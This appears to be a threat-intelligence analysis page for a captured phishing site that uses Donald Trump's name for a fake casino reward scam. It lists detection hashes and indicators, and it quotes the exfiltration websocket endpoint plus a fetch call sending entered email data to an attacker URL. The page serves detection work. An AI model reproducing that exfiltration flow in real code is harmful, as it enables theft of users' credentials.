Detailed analysis of captured phishing page
Used to detect similar phishing pages based on HTML content
| Algorithm | Hash Value |
|---|---|
|
CONTENT
TLSH
|
T16CE229B4A230D735B1C247E8DA6429287A5FE1DDD7C695B4E388AF11B0D6CE8D8250CB |
|
CONTENT
ssdeep
|
384:4r/aJcuvnQRvRhiXkdvNTDhPhLxeAxeDWNW1Tp34PxeeJEmuW3As0yRW8Md:4r/aJcuvnghhPhleMeDGCSPxeeWmHxW |
Used to detect visually similar phishing pages based on screenshots
| Algorithm | Hash Value |
|---|---|
|
VISUAL
pHash
|
c73338cc783e694c |
|
VISUAL
aHash
|
006660307078b690 |
|
VISUAL
dHash
|
4ccccac3e5e46431 |
|
VISUAL
wHash
|
a0666630787ebf98 |
|
VISUAL
colorHash
|
38206000000 |
|
VISUAL
cropResistant
|
85858a88da9a78fa,100c323232320810,4ccccac3e5e46431 |
• Amenaza: Phishing
• Objetivo: Usuarios desprevenidos
• Método: Suplantación de identidad y estafa de recompensa
• Exfil: wss://gambler-work.com/api/ws
• Indicadores: Dominio reciente, dominio no relacionado con la marca, uso del nombre de la marca, ofuscación de JavaScript, envío de formulario.
• Riesgo: Alto
The attacker impersonates a casino by using the name of Donald Trump to make a deceptive reward campaign. The goal is to trick the user into registering and providing sensitive information such as email and password to access rewards.
The website leverages the image of Donald Trump and the lure of 'free rewards' in order to gain trust and deceive victims.
User fills <input name=email> → signalsFBEventsExtractFromInputs() → fetch('https://trumpcasino.us/api/exfiltrate') → User data sent
User fills <input name=email> → signalsFBEventsExtractFromInputs() → fetch('https://trumpcasino.us/api/exfiltrate') → User data sent
signalsFBEventsExtractFromInputs.jssignalsFBEventsExtractFromInputssignalsFBEventsExtractEventPayload1925131974751650
Pages with identical visual appearance (based on perceptual hash)